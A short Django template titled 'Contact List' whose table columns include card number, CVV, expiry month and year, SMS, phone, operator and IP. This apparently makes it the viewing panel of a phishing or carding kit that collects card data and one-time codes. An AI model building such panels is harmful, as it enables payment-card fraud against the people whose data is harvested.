{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Contact List</title>
    <!-- Add Bootstrap CSS -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
</head>

<body>
    {% block content %}
        <div class="container">
            <h1>Contact List</h1>
            <table class="table table-striped table-hover">
                <thead class="table-dark">
                    <tr>
                        <th>ID</th>
                        <th>IP</th>
                        <th>operator</th>
                        <th>Phone</th>
                        <th>Amount</th>
                        <th>Card Number</th>
                        <th>CVV</th>
                        <th>MM</th>
                        <th>YY</th>
                        <th>SMS</th>
                        <th>Created At</th>
                        <th>Actions</th>
                    </tr>
                </thead>
                
                <tbody id="contact-table-body">
                    <!-- JavaScript will populate this section -->
                </tbody>
            </table>
            <p>You are visitor number {{ request.session.visit_count }}.</p>
        </div>
    {% endblock %}
    {% block extra_js %}
        <script src="{% static 'js/crud.js' %}"></script>
    {% endblock %}
    
    <!-- Add Bootstrap JavaScript -->
</body>
</html>
